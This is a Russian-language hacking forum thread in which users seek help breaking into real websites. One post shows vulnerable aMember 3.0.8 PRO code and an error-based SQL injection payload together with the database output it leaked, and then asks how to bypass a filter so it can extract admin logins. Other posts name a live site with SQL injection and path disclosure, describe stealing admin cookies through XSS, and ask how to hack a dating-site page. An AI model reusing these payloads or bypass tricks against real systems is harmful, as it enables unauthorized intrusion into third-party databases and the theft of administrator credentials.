 |
|
11.04.2013, 15:13
|
|
Новичок
Регистрация: 14.09.2010
Сообщений: 1
С нами:
8242166
Репутация:
0
|
|
Помогите новичку, пожалуйста. Что обычно делают с Xss уязвимостями, после того как обнаружил их?
|
|
|
11.04.2013, 15:30
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от Xazarychi
Помогите новичку, пожалуйста. Что обычно делают с Xss уязвимостями, после того как обнаружил их?
по идее дописуют жс код, подкидуют ссылку на уязвимость админу чтобы своровать куки(не спрашивай как, а просто ЗАЙДИ В ГУГЛ И ПОСМОТРИ, ТАМ СТАТЕЙ НА ЭТУ ТЕМУ МИЛИОНЫ), но в 99 процентов случаях просто забивают и ничего не делают, потому что, то админки нету, то связатся с админом невозможно, и вобще это такой гемор который в 90% случаев того не стоит.
|
|
|
|
11.04.2013, 16:27
|
|
Новичок
Регистрация: 10.03.2013
Сообщений: 1
С нами:
6934646
Репутация:
0
|
|
Можно ли и как возломать НЕпосещаемую страницу на сайте знакомств Loveplanet?
|
|
|
|
11.04.2013, 20:53
|
|
Новичок
Регистрация: 25.03.2013
Сообщений: 2
С нами:
6913046
Репутация:
5
|
|
Всем привет!
Подскажите можно из этого что нить извлечь
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//mlw-cardon.ru/check?domain=1'[/COLOR][/COLOR]
Havij v1.16 - не может подцепиться
А сам новичке не могу все время тот же результат |
|
|
|
11.04.2013, 21:12
|
|
Постоянный
Регистрация: 03.08.2012
Сообщений: 371
С нами:
7250006
Репутация:
37
|
|
как минимум это раскрытие путей /home/users2/w/waf/domains/mlw-cardon.ru/
удаленный инклуд не просматривается, хотя и очевиден =(
но есть скуля-буля там )) пиши мне в ПМ если хочешь узнать больше
|
|
|
|
11.04.2013, 21:30
|
|
Новичок
Регистрация: 25.03.2013
Сообщений: 2
С нами:
6913046
Репутация:
5
|
|
Сообщение от \/IRUS
как минимум это раскрытие путей /home/users2/w/waf/domains/mlw-cardon.ru/
удаленный инклуд не просматривается, хотя и очевиден =(
но есть скуля-буля там )) пиши мне в ПМ если хочешь узнать больше
Спасибо это было очевидно!
Но от помощи раскрыть sql не откажусь
|
|
|
|
12.04.2013, 01:52
|
|
Новичок
Регистрация: 22.04.2012
Сообщений: 4
С нами:
7398326
Репутация:
0
|
|
фильтр таблицы
привет всем !
нужна помощь в обходе фильтра на знак '_'
уязвимый код
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]list([/COLOR][COLOR="#0000BB"]$y[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#007700"]) =[/COLOR][COLOR="#0000BB"]split[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'_'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'year_month'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]sprintf[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'%02d'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$dat1[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$y[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]-[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]-01"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$dat2[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Y-m-t'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]strtotime[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$dat1[/COLOR][COLOR="#007700"]));
...........
[/COLOR][COLOR="#0000BB"]$q[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT DAYOFMONTH(ac.date), COUNT(commission_id),
SUM(IF(record_type='debit', amount, 0)),
SUM(IF(record_type='credit', amount, 0)),
SUM(IF(record_type='debit', 1, 0))
FROM[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]config[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]prefix[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]aff_commission ac
WHERE aff_id=[/COLOR][COLOR="#0000BB"]$member_id[/COLOR][COLOR="#DD0000"]AND ac.date BETWEEN '[/COLOR][COLOR="#0000BB"]$dat1[/COLOR][COLOR="#DD0000"]' AND '[/COLOR][COLOR="#0000BB"]$dat2[/COLOR][COLOR="#DD0000"]'
GROUP BY DAYOFMONTH(ac.date)
"[/COLOR][COLOR="#007700"]);
...........
[/COLOR][/COLOR]
запрос который у меня вышел
Сообщение от None
?year_month=2013-01-01' and(select 1 from(select count(*),concat(concat(user(),0x3a,version(),0x3a, database()),floor(rand(0)*2))x from(select 1 union select 2 union select 3)z group by x)a) -- _1&action=stats
в ответ получил
MYSQL ERROR:
Duplicate entry 'support_memuser@localhost:5.5.23-55:support_memb1' for key 'group_key'
in query:
SELECT DAYOFMONTH(ac.date), COUNT(commission_id), SUM(IF(record_type='debit', amount, 0)), SUM(IF(record_type='credit', amount, 0)), SUM(IF(record_type='debit', 1, 0)) FROM amember_aff_commission ac WHERE aff_id=4753 AND ac.date BETWEEN '2013-01-01' AND '1969-12-31' and(select 1 from(select count(*),concat(concat(user(),0x3a,version(),0x3a, database()),floor(rand(0)*2))x from(select 1 union select 2 union select 3)z group by x)a) -- -01-01' AND '1969-12-31' GROUP BY DAYOFMONTH(ac.date)
Сообщение от None
?year_month=2013-01-01' and(select 1 from(select count(*),concat((select login from
member_admins
limit 0,1),floor(rand(0)*2))x from(select 1 union select 2 union select 3)z group by x)a) -- _1&action=stats
ну и в ответ соответственно
MYSQL ERROR:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-00-01' AND '1969-12-31' GROUP BY DAYOFMONTH(ac.date)' at line 6
in query:
SELECT DAYOFMONTH(ac.date), COUNT(commission_id), SUM(IF(record_type='debit', amount, 0)), SUM(IF(record_type='credit', amount, 0)), SUM(IF(record_type='debit', 1, 0)) FROM amember_aff_commission ac WHERE aff_id=4753 AND ac.date BETWEEN '2013-01-01' AND '1969-12-31' and(select 1 from(select count(*),concat((select login
from member-00-01' AND '1969-12-31' GROUP BY DAYOFMONTH(ac.date)
можно ли каким то образом обойти такой фильтр???
зашифровать?
чтото типа
Код:
SELECT * FROM (SELECT 0x7461626c655f6e616d65) AS t2
да и к стати это уязвимость в aMember 3.0.8 PRO в фаиле aff.php
|
|
|
|
12.04.2013, 05:41
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от None
привет всем !
нужна помощь в обходе фильтра на знак '_'
select login from member_admins
select login from member%5fadmins
select login from member%255fadmins
|
|
|
|
12.04.2013, 17:06
|
|
Новичок
Регистрация: 11.04.2013
Сообщений: 1
С нами:
6888566
Репутация:
0
|
|
SQLMAP
SQL-иньекция определила, что dbms - Microsoft Access! Но имя ее не может вытащить! Если пытаться посмотреть список таблиц то у всех название _fil! Кто сталкивался с такой проблемой? НУЖНА ПОМОЩЬ! Скрины прилагаются
 |
|
|
|
13.04.2013, 01:03
|
|
Новичок
Регистрация: 22.04.2012
Сообщений: 4
С нами:
7398326
Репутация:
0
|
|
Сообщение от BigBear
select login from member_admins
select login from member%5fadmins
select login from member%255fadmins
тут это не поможет так %5f при обработке превращается в '_' и
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]list([/COLOR][COLOR="#0000BB"]$y[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#007700"]) =[/COLOR][COLOR="#0000BB"]split[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'_'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$vars[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'year_month'[/COLOR][COLOR="#007700"]]);[/COLOR][/COLOR]
его рубит
надо ка кто выполнить запрос вообще без этого знака
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
